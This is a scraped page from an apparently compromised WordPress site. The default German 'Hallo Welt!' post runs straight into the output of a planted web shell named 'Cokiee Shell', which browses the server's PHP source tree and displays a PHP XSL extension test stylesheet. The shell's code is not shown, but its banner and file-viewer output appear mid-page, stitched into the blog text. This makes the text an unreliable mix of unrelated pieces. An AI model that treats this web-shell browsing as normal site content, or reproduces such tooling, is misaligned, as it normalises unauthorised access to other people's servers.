Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/ext/xsl/tests/ |
Current File : //usr/local/src/php7/php-7.0.5/ext/xsl/tests/xslt011.xsl |
<?xml version='1.0'?> <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" xsl:extension-element-prefixes="php" version='1.0'> <xsl:template match="/"> <xsl:value-of select="php:functionString('foobar', /doc/@id, 'secondArg')"/> <xsl:text> </xsl:text> <xsl:value-of select="php:function('foobar', /doc/@id)"/> <xsl:text> </xsl:text> <xsl:value-of select="php:function('nodeSet')"/> <xsl:text> </xsl:text> <xsl:value-of select="php:function('nodeSet',/doc)/i"/> <xsl:text> </xsl:text> <xsl:value-of select="php:function('aClass::aStaticFunction','static')"/> <xsl:text> </xsl:text> <xsl:value-of select="php:function('nonDomNode')"/> </xsl:template> </xsl:stylesheet>
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare